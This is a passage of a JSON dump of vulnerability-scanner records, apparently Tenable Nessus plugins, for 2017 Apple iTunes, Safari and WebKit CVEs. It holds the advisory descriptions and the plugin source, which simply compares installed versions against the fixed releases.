\"CVE-2017-7034\",\n \"CVE-2017-7037\",\n \"CVE-2017-7039\",\n \"CVE-2017-7040\",\n \"CVE-2017-7041\",\n \"CVE-2017-7042\",\n \"CVE-2017-7043\",\n \"CVE-2017-7046\",\n \"CVE-2017-7048\",\n \"CVE-2017-7049\",\n \"CVE-2017-7052\",\n \"CVE-2017-7053\",\n \"CVE-2017-7055\",\n \"CVE-2017-7056\",\n \"CVE-2017-7061\",\n \"CVE-2017-7064\"\n );\n script_bugtraq_id(\n 99879,\n 99884,\n 99885,\n 99889,\n 99890\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-07-19-6\");\n\n script_name(english:\"Apple iTunes < 12.6.2 Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.6.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Multiple out-of-bounds read errors exist in the libxml2\n component due to improper handling of specially crafted\n XML documents. An unauthenticated, remote attacker can\n exploit these to disclose user information.\n (CVE-2017-7010, CVE-2017-7013)\n\n - Multiple memory corruption issues exist in the Webkit\n Web Inspector component due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit these, via a specially crafted web page, to\n corrupt memory, resulting in the execution of arbitrary\n code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit\n component due to improper validation of input. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted web page, to execute\n arbitrary code. (CVE-2017-7018, CVE-2017-7020,\n CVE-2017-7030, CVE-2017-7034, CVE-2017-7037,\n CVE-2017-7039, CVE-2017-7040, CVE-2017-7041,\n CVE-2017-7042, CVE-2017-7043, CVE-2017-7046,\n CVE-2017-7048, CVE-2017-7049, CVE-2017-7052,\n CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page\n Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted web page, to execute arbitrary\n code. (CVE-2017-7019)\n\n - A flaw exists in the iPodService component when handling\n the iPodManager COM control due to insufficient access\n restrictions. A local attacker can exploit this to\n execute arbitrary code with system privileges.\n (CVE-2017-7053)\n\n - An unspecified memory initialization issue exists in\n Webkit. A local attacker can exploit this, via a\n specially crafted application, to disclose the contents\n of restricted memory. (CVE-2017-7064)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207928\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.6.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7053\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\n# Ensure this is Windows\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"iTunes Version\", win_local:TRUE);\n\nconstraints = [{\"fixed_version\" : \"12.6.2\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:35:50", "description": "The version of Apple iTunes running on the remote host is prior to 12.6.2. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple out-of-bounds read errors exist in the libxml2 component due to improper handling of specially crafted XML documents. An unauthenticated, remote attacker can exploit these to disclose user information.\n (CVE-2017-7010, CVE-2017-7013)\n\n - Multiple memory corruption issues exist in the Webkit Web Inspector component due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit these, via a specially crafted web page, to corrupt memory, resulting in the execution of arbitrary code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit component due to improper validation of input. An unauthenticated, remote attacker can exploit these issues, via a specially crafted web page, to execute arbitrary code. (CVE-2017-7018, CVE-2017-7020, CVE-2017-7030, CVE-2017-7034, CVE-2017-7037, CVE-2017-7039, CVE-2017-7040, CVE-2017-7041, CVE-2017-7042, CVE-2017-7043, CVE-2017-7046, CVE-2017-7048, CVE-2017-7049, CVE-2017-7052, CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to execute arbitrary code. (CVE-2017-7019)\n\n - A flaw exists in the iPodService component when handling the iPodManager COM control due to insufficient access restrictions. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with system privileges. (CVE-2017-7053)\n\n - An unspecified memory initialization issue exists in Webkit. A local attacker can exploit this, via a specially crafted application, to disclose the contents of restricted memory. (CVE-2017-7064)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-25T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.6.2 Multiple Vulnerabilities (uncredentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7010", "CVE-2017-7012", "CVE-2017-7013", "CVE-2017-7018", "CVE-2017-7019", "CVE-2017-7020", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7039", "CVE-2017-7040", "CVE-2017-7041", "CVE-2017-7042", "CVE-2017-7043", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7049", "CVE-2017-7052", "CVE-2017-7053", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7061", "CVE-2017-7064"], "modified": "2019-11-12T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_6_2_BANNER.NASL", "href": "https://www.tenable.com/plugins/nessus/101955", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101955);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-7010\",\n \"CVE-2017-7012\",\n \"CVE-2017-7013\",\n \"CVE-2017-7018\",\n \"CVE-2017-7019\",\n \"CVE-2017-7020\",\n \"CVE-2017-7030\",\n \"CVE-2017-7034\",\n \"CVE-2017-7037\",\n \"CVE-2017-7039\",\n \"CVE-2017-7040\",\n \"CVE-2017-7041\",\n \"CVE-2017-7042\",\n \"CVE-2017-7043\",\n \"CVE-2017-7046\",\n \"CVE-2017-7048\",\n \"CVE-2017-7049\",\n \"CVE-2017-7052\",\n \"CVE-2017-7053\",\n \"CVE-2017-7055\",\n \"CVE-2017-7056\",\n \"CVE-2017-7061\",\n \"CVE-2017-7064\"\n );\n script_bugtraq_id(\n 99879,\n 99884,\n 99885,\n 99889,\n 99890\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-07-19-6\");\n\n script_name(english:\"Apple iTunes < 12.6.2 Multiple Vulnerabilities (uncredentialed check)\");\n script_summary(english:\"Checks the version of iTunes.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application running on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes running on the remote host is prior to\n12.6.2. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple out-of-bounds read errors exist in the libxml2\n component due to improper handling of specially crafted\n XML documents. An unauthenticated, remote attacker can\n exploit these to disclose user information.\n (CVE-2017-7010, CVE-2017-7013)\n\n - Multiple memory corruption issues exist in the Webkit\n Web Inspector component due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit these, via a specially crafted web page, to\n corrupt memory, resulting in the execution of arbitrary\n code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit\n component due to improper validation of input. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted web page, to execute\n arbitrary code. (CVE-2017-7018, CVE-2017-7020,\n CVE-2017-7030, CVE-2017-7034, CVE-2017-7037,\n CVE-2017-7039, CVE-2017-7040, CVE-2017-7041,\n CVE-2017-7042, CVE-2017-7043, CVE-2017-7046,\n CVE-2017-7048, CVE-2017-7049, CVE-2017-7052,\n CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page\n Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted web page, to execute arbitrary\n code. (CVE-2017-7019)\n\n - A flaw exists in the iPodService component when handling\n the iPodManager COM control due to insufficient access\n restrictions. A local attacker can exploit this, via\n a specially crafted application, to execute arbitrary\n code with system privileges. (CVE-2017-7053)\n\n - An unspecified memory initialization issue exists in\n Webkit. A local attacker can exploit this, via a\n specially crafted application, to disclose the contents\n of restricted memory. (CVE-2017-7064)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207928\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.6.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7053\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Peer-To-Peer File Sharing\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_sharing.nasl\");\n script_require_keys(\"iTunes/sharing\");\n script_require_ports(\"Services/www\", 3689);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:3689, embedded:TRUE, ignore_broken:TRUE);\n\nget_kb_item_or_exit(\"iTunes/\" + port + \"/enabled\");\n\ntype = get_kb_item_or_exit(\"iTunes/\" + port + \"/type\");\nsource = get_kb_item_or_exit(\"iTunes/\" + port + \"/source\");\nversion = get_kb_item_or_exit(\"iTunes/\" + port + \"/version\");\n\nfixed_version = \"12.6.2\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n report = '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"iTunes\", port, version);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:35:39", "description": "Versions of Safari prior to 10.1.2 are affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the WebKit component due to improper handling of SVG filters. An unauthenticated, remote attacker can exploit this, via a timing side-channel attack, to disclose sensitive cross-domain information. (CVE-2017-7006)\n - An unspecified flaw exists that allows an unauthenticated, remote attacker to spoof the address bar via a specially crafted website. (CVE-2017-7011)\n - Multiple memory corruption issues exists in the 'WebKit Web Inspector' component due to improper validation of input. An unauthenticated, remote attacker can exploit these issues, via a specially crafted web page, to execute arbitrary code. (CVE-2017-7012)\n - Multiple memory corruption issues exist in the WebKit component due to improper validation of input. An unauthenticated, remote attacker can exploit these issues, via a specially crafted web page, to execute arbitrary code. (CVE-2017-7018, CVE-2017-7020, CVE-2017-7030, CVE-2017-7034, CVE-2017-7037, CVE-2017-7039, CVE-2017-7040, CVE-2017-7041, CVE-2017-7042, CVE-2017-7043, CVE-2017-7046, CVE-2017-7048, CVE-2017-7049, CVE-2017-7052, CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n - A memory corruption issue exists in the 'WebKit Page Loading' component due to improper validation of input. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to execute arbitrary code. (CVE-2017-7019)\n - Multiple cross-site scripting (XSS) vulnerabilities exist in the WebKit component in the DOMParser due to improper validation of user-supplied input before returning it to users. An unauthenticated, remote attacker can exploit these issue, via a specially crafted URL, to execute arbitrary script code in a user's browser session. (CVE-2017-7038, CVE-2017-7059)\n - A denial of service vulnerability exists in the Safari Printing component. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to create an infinite number of print dialogs. (CVE-2017-7060)\n - An unspecified memory initialization flaw exists in WebKit. A local attacker can exploit this, via a specially crafted application, to disclose restricted memory. (CVE-2017-7064)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-27T00:00:00", "type": "nessus", "title": "Safari < 10.1.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7006", "CVE-2017-7011", "CVE-2017-7012", "CVE-2017-7018", "CVE-2017-7019", "CVE-2017-7020", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7038", "CVE-2017-7039", "CVE-2017-7040", "CVE-2017-7041", "CVE-2017-7042", "CVE-2017-7043", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7049", "CVE-2017-7052", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7059", "CVE-2017-7061", "CVE-2017-7064", "CVE-2017-7060"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*"], "id": "700166.PRM", "href": "https://www.tenable.com/plugins/nnm/700166", "sourceData": "Binary data 700166.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:35:46", "description": "The version of Apple Safari installed on the remote macOS or Mac OS X host is prior to 10.1.2. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the WebKit component due to improper handling of SVG filters.\n An unauthenticated, remote attacker can exploit this, via a timing side-channel attack, to disclose sensitive cross-domain information. (CVE-2017-7006)\n\n - An unspecified flaw exists that allows an unauthenticated, remote attacker to spoof the address bar via a specially crafted website. (CVE-2017-7011)\n\n - Multiple memory corruption issues exists in the 'WebKit Web Inspector' component due to improper validation of input. An unauthenticated, remote attacker can exploit these issues, via a specially crafted web page, to execute arbitrary code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit component due to improper validation of input. An unauthenticated, remote attacker can exploit these issues, via a specially crafted web page, to execute arbitrary code. (CVE-2017-7018, CVE-2017-7020, CVE-2017-7030, CVE-2017-7034, CVE-2017-7037, CVE-2017-7039, CVE-2017-7040, CVE-2017-7041, CVE-2017-7042, CVE-2017-7043, CVE-2017-7046, CVE-2017-7048, CVE-2017-7049, CVE-2017-7052, CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to execute arbitrary code. (CVE-2017-7019)\n\n - Multiple cross-site scripting (XSS) vulnerabilities exist in the WebKit component in the DOMParser due to improper validation of user-supplied input before returning it to users. An unauthenticated, remote attacker can exploit these issue, via a specially crafted URL, to execute arbitrary script code in a user's browser session. (CVE-2017-7038, CVE-2017-7059)\n\n - A denial of service vulnerability exists in the Safari Printing component. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to create an infinite number of print dialogs.\n (CVE-2017-7060)\n\n - An unspecified memory initialization flaw exists in WebKit. A local attacker can exploit this, via a specially crafted application, to disclose restricted memory. (CVE-2017-7064)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-24T00:00:00", "type": "nessus", "title": "macOS : Apple Safari < 10.1.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7006", "CVE-2017-7011", "CVE-2017-7012", "CVE-2017-7018", "CVE-2017-7019", "CVE-2017-7020", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7038", "CVE-2017-7039", "CVE-2017-7040", "CVE-2017-7041", "CVE-2017-7042", "CVE-2017-7043", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7049", "CVE-2017-7052", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7059", "CVE-2017-7060", "CVE-2017-7061", "CVE-2017-7064"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/a:apple:safari"], "id": "MACOSX_SAFARI10_1_2.NASL", "href": "https://www.tenable.com/plugins/nessus/101931", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101931);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/14 1:59:37\");\n\n script_cve_id(\n \"CVE-2017-7006\",\n \"CVE-2017-7011\",\n \"CVE-2017-7012\",\n \"CVE-2017-7018\",\n \"CVE-2017-7019\",\n \"CVE-2017-7020\",\n \"CVE-2017-7030\",\n \"CVE-2017-7034\",\n \"CVE-2017-7037\",\n \"CVE-2017-7038\",\n \"CVE-2017-7039\",\n \"CVE-2017-7040\",\n \"CVE-2017-7041\",\n \"CVE-2017-7042\",\n \"CVE-2017-7043\",\n \"CVE-2017-7046\",\n \"CVE-2017-7048\",\n \"CVE-2017-7049\",\n \"CVE-2017-7052\",\n \"CVE-2017-7055\",\n \"CVE-2017-7056\",\n \"CVE-2017-7059\",\n \"CVE-2017-7060\",\n \"CVE-2017-7061\",\n \"CVE-2017-7064\"\n );\n script_bugtraq_id(\n 99885,\n 99886,\n 99887,\n 99888,\n 99890\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-07-19-5\");\n script_xref(name:\"ZDI\", value:\"ZDI-17-489\");\n\n script_name(english:\"macOS : Apple Safari < 10.1.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X\nhost is prior to 10.1.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An information disclosure vulnerability exists in the\n WebKit component due to improper handling of SVG filters.\n An unauthenticated, remote attacker can exploit this,\n via a timing side-channel attack, to disclose sensitive\n cross-domain information. (CVE-2017-7006)\n\n - An unspecified flaw exists that allows an\n unauthenticated, remote attacker to spoof the address\n bar via a specially crafted website. (CVE-2017-7011)\n\n - Multiple memory corruption issues exists in the 'WebKit\n Web Inspector' component due to improper validation of\n input. An unauthenticated, remote attacker can exploit\n these issues, via a specially crafted web page, to\n execute arbitrary code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit\n component due to improper validation of input. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted web page, to execute\n arbitrary code. (CVE-2017-7018, CVE-2017-7020,\n CVE-2017-7030, CVE-2017-7034, CVE-2017-7037,\n CVE-2017-7039, CVE-2017-7040, CVE-2017-7041,\n CVE-2017-7042, CVE-2017-7043, CVE-2017-7046,\n CVE-2017-7048, CVE-2017-7049, CVE-2017-7052,\n CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page\n Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted web page, to execute arbitrary\n code. (CVE-2017-7019)\n\n - Multiple cross-site scripting (XSS) vulnerabilities\n exist in the WebKit component in the DOMParser due to\n improper validation of user-supplied input before\n returning it to users. An unauthenticated, remote\n attacker can exploit these issue, via a specially\n crafted URL, to execute arbitrary script code in a\n user's browser session. (CVE-2017-7038, CVE-2017-7059)\n\n - A denial of service vulnerability exists in the Safari\n Printing component. An unauthenticated, remote attacker\n can exploit this, via a specially crafted web page, to\n create an infinite number of print dialogs.\n (CVE-2017-7060)\n\n - An unspecified memory initialization flaw exists in\n WebKit. A local attacker can exploit this, via a\n specially crafted application, to disclose restricted\n memory. (CVE-2017-7064)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207921\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2017/Jul/39\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 10.1.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_Safari31.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X or macOS\");\n\nif (!preg(pattern:\"Mac OS X 10\\.(10|11|12)([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X Yosemite 10.10 / Mac OS X El Capitan 10.11 / macOS Sierra 10.12\");\n\ninstalled = get_kb_item_or_exit(\"MacOSX/Safari/Installed\", exit_code:0);\npath = get_kb_item_or_exit(\"MacOSX/Safari/Path\", exit_code:1);\nversion = get_kb_item_or_exit(\"MacOSX/Safari/Version\", exit_code:1);\n\nfixed_version = \"10.1.2\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n \"Path\", path,\n \"Installed version\", version,\n \"Fixed version\", fixed_version\n ),\n ordered_fields:make_list(\"Path\", \"Installed version\", \"Fixed version\")\n );\n security_report_v4(port:0, severity:SECURITY_HOLE, extra:report, xss:true);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Safari\", version, path);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:35:57", "description": "The Webkit gtk team reports :\n\nPlease reference CVE/URL list for details", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-26T00:00:00", "type": "nessus", "title": "FreeBSD : webkit2-gtk3 -- multiple vulnerabilities (0f66b901-715c-11e7-ad1f-bcaec565249c)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7006", "CVE-2017-7011", "CVE-2017-7012", "CVE-2017-7018", "CVE-2017-7019", "CVE-2017-7020", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7038", "CVE-2017-7039", "CVE-2017-7040", "CVE-2017-7041", "CVE-2017-7042", "CVE-2017-7043", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7049", "CVE-2017-7052", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7059", "CVE-2017-7061", "CVE-2017-7064"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:webkit2-gtk3", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_0F66B901715C11E7AD1FBCAEC565249C.NASL", "href": "https://www.tenable.com/plugins/nessus/101966", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101966);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-7006\", \"CVE-2017-7011\", \"CVE-2017-7012\", \"CVE-2017-7018\", \"CVE-2017-7019\", \"CVE-2017-7020\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7038\", \"CVE-2017-7039\", \"CVE-2017-7040\", \"CVE-2017-7041\", \"CVE-2017-7042\", \"CVE-2017-7043\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7049\", \"CVE-2017-7052\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7059\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n\n script_name(english:\"FreeBSD : webkit2-gtk3 -- multiple vulnerabilities (0f66b901-715c-11e7-ad1f-bcaec565249c)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Webkit gtk team reports :\n\nPlease reference CVE/URL list for details\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 